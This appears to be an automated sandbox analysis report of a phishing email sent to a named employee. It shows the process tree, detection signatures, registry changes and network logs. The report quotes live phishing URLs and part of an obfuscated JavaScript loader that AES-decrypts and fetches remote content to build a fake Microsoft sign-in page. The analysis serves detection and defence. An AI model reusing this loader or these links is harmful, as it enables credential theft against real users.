Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Murexltd Mail Security Update Required For gjohnson@murexltd.com.msg

Overview

General Information

Sample name:Murexltd Mail Security Update Required For gjohnson@murexltd.com.msg
Analysis ID:1499929
MD5:30fecd626c4847d7896d1dc0e9eca992
SHA1:64f7974ffe2bd1addf0219565a9eb594ed00d769
SHA256:774b494a1ddc338f3d5292872dd868c4eb8bc129c545de803fbbfee1d69cb396
Infos:

Detection

HTMLPhisher
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish70
HTML page contains hidden URLs
HTML page contains hidden email address
HTML page contains suspicious javascript code
Phishing site detected (based on shot match)
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
Invalid T&C link found
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Sigma detected: Outlook Security Settings Updated - Registry
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 1876 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\Murexltd Mail Security Update Required For gjohnson@murexltd.com.msg" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 6932 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "AE84D475-9D90-4699-AC09-546AA3816293" "D5AC2D48-97CD-47FA-8517-B1F27648D3AF" "1876" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • Acrobat.exe (PID: 6448 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\QD6UVN5U\New Security Update.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 6728 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 2336 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2276 --field-trial-handle=1596,i,9170700212267717821,16395113202581352541,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • chrome.exe (PID: 1428 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://umeleoplodnenie.com/.well-known/tvavx.php?7-797967704b536932307463764b4d3070546b334f4c79704a72556a564b793549544537566a776f6f53537a534277413d-Z2pvaG5zb25AbXVyZXhsdGQuY29t MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 2852 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1928,i,7679209889696324048,15971971168667836464,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 6608 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://umeleoplodnenie.com/.well-known/tvavx.php?7-797967704b536932307463764b4d3070546b334f4c79704a72556a564b793549544537566a776f6f53537a534277413d-Z2pvaG5zb25AbXVyZXhsdGQuY29t MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 1172 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1688 --field-trial-handle=1816,i,15692130149549399329,3202881519042920722,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 3652 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://privacy.microsoft.com/en-us/privacystatement MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 4372 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1648,i,18346115663878279960,8781314979337182349,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
8.8.pages.csvJoeSecurity_HtmlPhish_70Yara detected HtmlPhish_70Joe Security
    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 1876, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
    Source: Registry Key setAuthor: frack113: Data: Details: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\QD6UVN5U\, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 1876, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Security\OutlookSecureTempFolder
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: Yara matchFile source: 8.8.pages.csv, type: HTML
    Source: https://pulsecortexe.space/ZPtar/#SZ2pvaG5zb25AbXVyZXhsdGQuY29tHTTP Parser: https://infinitipulsarjoy.ru///2846.php
    Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29tHTTP Parser: https://infinitipulsarjoy.ru///7488.php
    Source: https://umeleoplodnenie.com/.well-known/tvavx.phpHTTP Parser: gjohnson@murexltd.com
    Source: https://umeleoplodnenie.com/.well-known/tvavx.phpHTTP Parser: gjohnson@murexltd.com
    Source: https://pulsecortexe.space/ZPtar/#SZ2pvaG5zb25AbXVyZXhsdGQuY29tHTTP Parser: window.location.href = atob(
    Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29tHTTP Parser: window.location.href = atob(
    Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29tMatcher: Template: captcha matched
    Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29tMatcher: Template: captcha matched
    Source: https://pulsecortexe.space/ZPtar/#SZ2pvaG5zb25AbXVyZXhsdGQuY29tHTTP Parser: async function earl(iamb) { <!-- a cars beauty lies in the stories it tells. --> var {a,b,c,d} = json.parse(iamb); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}), {iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); <!-- <p>discover yourself on the open road.</p> --> } (async () => { document.write(await earl(await (await fetch(await earl(atob(`eyjhijoia0m0nyt4y2r2vvfqdm5iz0xrmknxvw83whe5d1dhxc9gdwkrbk83mjjbejg9iiwiyyi6ijg5yjhhzwfiogmwmzc3zwuznwe1nmzmnmqxmwizzmuxiiwiyii6imu5otfhmgeznwnkntgwngi1nzfmndu3yzuwndy0mmu4y2rmyzjmztk5zdu3nzy2ndvln2e4y2yxnjhlzmjiztewowy3mtq0n2rkngeyymjintmynwexmge4ntu4mzrlnmvlnjvmmtrjmjjlmzy2mwezmmvlnjlknji4mmixngvmndgwm2i2ytjjngvhymu1ztk3mwy0mmjhnjk2ndeyymuxzjnlndzjote3nzc3m2y5yjy2otk2mzfimde2ngm4ndq0zgq4zdq5ngq0zdyymzcwzgrintg3owe4ywzkndmxmwezmjq2mzqzn2vlnzeymwi3ognimgjjntm3yjk3njk3njjhmtnhmmi5mgi0njhjztg4odnkn2q0mtbkmjy1...
    Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29tHTTP Parser: async function earl(iamb) { <!-- a cars beauty lies in the stories it tells. --> var {a,b,c,d} = json.parse(iamb); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}), {iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); <!-- <p>discover yourself on the open road.</p> --> } (async () => { document.write(await earl(await (await fetch(await earl(atob(`eyjhijoia0m0nyt4y2r2vvfqdm5iz0xrmknxvw83whe5d1dhxc9gdwkrbk83mjjbejg9iiwiyyi6ijg5yjhhzwfiogmwmzc3zwuznwe1nmzmnmqxmwizzmuxiiwiyii6imu5otfhmgeznwnkntgwngi1nzfmndu3yzuwndy0mmu4y2rmyzjmztk5zdu3nzy2ndvln2e4y2yxnjhlzmjiztewowy3mtq0n2rkngeyymjintmynwexmge4ntu4mzrlnmvlnjvmmtrjmjjlmzy2mwezmmvlnjlknji4mmixngvmndgwm2i2ytjjngvhymu1ztk3mwy0mmjhnjk2ndeyymuxzjnlndzjote3nzc3m2y5yjy2otk2mzfimde2ngm4ndq0zgq4zdq5ngq0zdyymzcwzgrintg3owe4ywzkndmxmwezmjq2mzqzn2vlnzeymwi3ognimgjjntm3yjk3njk3njjhmtnhmmi5mgi0njhjztg4odnkn2q0mtbkmjy1...
    Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29tHTTP Parser: Number of links: 0
    Source: https://pulsecortexe.space/ZPtar/#SZ2pvaG5zb25AbXVyZXhsdGQuY29tHTTP Parser: Number of links: 0
    Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29tHTTP Parser: <input type="password" .../> found but no <form action="...
    Source: https://pulsecortexe.space/ZPtar/#SZ2pvaG5zb25AbXVyZXhsdGQuY29tHTTP Parser: <input type="password" .../> found but no <form action="...
    Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29tHTTP Parser: Total embedded image size: 45708
    Source: https://pulsecortexe.space/ZPtar/#SZ2pvaG5zb25AbXVyZXhsdGQuY29tHTTP Parser: Total embedded image size: 45708
    Source: https://umeleoplodnenie.com/.well-known/tvavx.phpHTTP Parser: Base64 decoded: gjohnson@murexltd.com
    Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29tHTTP Parser: Title: Sign in to your account does not match URL
    Source: https://pulsecortexe.space/ZPtar/#SZ2pvaG5zb25AbXVyZXhsdGQuY29tHTTP Parser: Title: Sign in to your account does not match URL
    Source: https://privacy.microsoft.com/en-us/privacystatementHTTP Parser: Invalid link: Other important privacy information
    Source: https://privacy.microsoft.com/en-us/privacystatementHTTP Parser: Invalid link: U.S. State Data Privacy
    Source: https://privacy.microsoft.com/en-us/privacystatementHTTP Parser: Invalid link: Changes to this privacy statement
    Source: https://privacy.microsoft.com/en-us/privacystatementHTTP Parser: Invalid link: Get Help
    Source: https://privacy.microsoft.com/en-us/privacystatementHTTP Parser: Invalid link: Other important privacy information
    Source: https://privacy.microsoft.com/en-us/privacystatementHTTP Parser: Invalid link: U.S. State Data Privacy
    Source: https://privacy.microsoft.com/en-us/privacystatementHTTP Parser: Invalid link: Changes to this privacy statement
    Source: https://privacy.microsoft.com/en-us/privacystatementHTTP Parser: Invalid link: Get Help
    Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29tHTTP Parser: <input type="password" .../> found
    Source: https://pulsecortexe.space/ZPtar/#SZ2pvaG5zb25AbXVyZXhsdGQuY29tHTTP Parser: <input type="password" .../> found
    Source: https://umeleoplodnenie.com/.well-known/tvavx.phpHTTP Parser: No favicon
    Source: https://umeleoplodnenie.com/.well-known/tvavx.phpHTTP Parser: No favicon
    Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29tHTTP Parser: No favicon
    Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29tHTTP Parser: No favicon
    Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29tHTTP Parser: No favicon
    Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29tHTTP Parser: No favicon
    Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29tHTTP Parser: No favicon
    Source: https://pulsecortexe.space/ZPtar/#SZ2pvaG5zb25AbXVyZXhsdGQuY29tHTTP Parser: No favicon
    Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29tHTTP Parser: No <meta name="author".. found
    Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29tHTTP Parser: No <meta name="author".. found
    Source: https://pulsecortexe.space/ZPtar/#SZ2pvaG5zb25AbXVyZXhsdGQuY29tHTTP Parser: No <meta name="author".. found
    Source: https://privacy.microsoft.com/en-us/privacystatementHTTP Parser: No <meta name="author".. found
    Source: https://privacy.microsoft.com/en-us/privacystatementHTTP Parser: No <meta name="author".. found
    Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29tHTTP Parser: No <meta name="copyright".. found
    Source: https://pulsecortexe.space/ZPtar/#HZ2pvaG5zb25AbXVyZXhsdGQuY29tHTTP Parser: No <meta name="copyright".. found
    Source: https://pulsecortexe.space/ZPtar/#SZ2pvaG5zb25AbXVyZXhsdGQuY29tHTTP Parser: No <meta name="copyright".. found
    Source: https://privacy.microsoft.com/en-us/privacystatementHTTP Parser: No <meta name="copyright".. found
    Source: https://privacy.microsoft.com/en-us/privacystatementHTTP Parser: No <meta name="copyright".. found
    Source: unknownHTTPS traffic detected: 20.190.159.23:443 -> 192.168.2.16:49705 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.190.159.23:443 -> 192.168.2.16:49708 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49709 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49712 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:49714 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 51.104.136.2:443 -> 192.168.2.16:49716 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.190.159.23:443 -> 192.168.2.16:49717 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.71.55.58:443 -> 192.168.2.16:49720 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.71.55.58:443 -> 192.168.2.16:54185 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.71.55.58:443 -> 192.168.2.16:54190 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.71.55.58:443 -> 192.168.2.16:54195 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:56244 version: TLS 1.2
    Source: global trafficTCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:56242 -> 162.159.36.2:53
    Source: global trafficTCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:56242 -> 162.159.36.2:53
    Source: global trafficTCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:56242 -> 162.159.36.2:53
    Source: global trafficTCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:56242 -> 162.159.36.2:53
    Source: global trafficTCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:56242 -> 162.159.36.2:53
    Source: global trafficTCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:56242 -> 162.159.36.2:53
    Source: global trafficTCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:56242 -> 162.159.36.2:53
    Source: global trafficTCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:56242 -> 162.159.36.2:53
    Source: global trafficTCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:56242 -> 162.159.36.2:53
    Source: global trafficTCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:56242 -> 162.159.36.2:53
    Source: global trafficTCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:56242 -> 162.159.36.2:53
    Source: global trafficTCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:56242 -> 162.159.36.2:53
    Source: global trafficTCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:56242 -> 162.159.36.2:53
    Source: global trafficTCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:56242 -> 162.159.36.2:53
    Source: global trafficTCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:56242 -> 162.159.36.2:53
    Source: global trafficTCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:56242 -> 162.159.36.2:53
    Source: global trafficTCP traffic: 192.168.2.16:54180 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.16:56242 -> 162.159.36.2:53
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.23
    Source: global trafficDNS traffic detected: DNS query: umeleoplodnenie.com
    Source: global trafficDNS traffic detected: DNS query: pulsecortexe.space
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: infinitipulsarjoy.ru
    Source: global trafficDNS traffic detected: DNS query: code.jquery.com
    Source: global trafficDNS traffic detected: DNS query: ajax.aspnetcdn.com
    Source: global trafficDNS traffic detected: DNS query: c.s-microsoft.com
    Source: global trafficDNS traffic detected: DNS query: assets.onestore.ms
    Source: global trafficDNS traffic detected: DNS query: i.s-microsoft.com
    Source: global trafficDNS traffic detected: DNS query: apis.google.com
    Source: global trafficDNS traffic detected: DNS query: play.google.com
    Source: global trafficDNS traffic detected: DNS query: e-fukuyoshi.com
    Source: global trafficDNS traffic detected: DNS query: google.com
    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54209 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56251 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56316
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56317
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56318
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56319
    Source: unknownNetwork traffic detected: HTTP traffic on port 54221 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56313
    Source: unknownNetwork traffic detected: HTTP traffic on port 56302 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56314
    Source: unknownNetwork traffic detected: HTTP traffic on port 54201 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56315
    Source: unknownNetwork traffic detected: HTTP traffic on port 56322 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56286
    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56320
    Source: unknownNetwork traffic detected: HTTP traffic on port 56325 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56288 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56288
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56321
    Source: unknownNetwork traffic detected: HTTP traffic on port 54224 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56289
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56322
    Source: unknownNetwork traffic detected: HTTP traffic on port 54218 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56319 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54212 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54206 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56323
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56325
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56326
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56297
    Source: unknownNetwork traffic detected: HTTP traffic on port 56291 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56299
    Source: unknownNetwork traffic detected: HTTP traffic on port 54190 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54227 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56290
    Source: unknownNetwork traffic detected: HTTP traffic on port 54230 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56291
    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56299 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56310 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56314 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56257 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56247 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54185 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56286 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56320 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54200 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56301 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54191 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56244 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56263 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56317 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
    Source: unknownNetwork traffic detected: HTTP traffic on port 54216 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54209
    Source: unknownNetwork traffic detected: HTTP traffic on port 54214 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54208
    Source: unknownNetwork traffic detected: HTTP traffic on port 56252 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54202
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54201
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54200
    Source: unknownNetwork traffic detected: HTTP traffic on port 54208 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54207
    Source: unknownNetwork traffic detected: HTTP traffic on port 54222 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54206
    Source: unknownNetwork traffic detected: HTTP traffic on port 56309 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54205
    Source: unknownNetwork traffic detected: HTTP traffic on port 56323 -> 443
